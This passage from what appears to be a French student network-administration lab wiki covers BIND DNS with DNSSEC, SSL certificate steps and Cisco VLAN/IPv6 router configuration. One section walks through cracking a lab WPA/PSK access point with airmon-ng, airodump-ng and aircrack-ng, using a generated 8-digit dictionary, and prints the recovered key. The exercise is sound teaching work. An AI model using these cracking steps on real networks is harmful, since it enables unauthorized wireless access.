Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
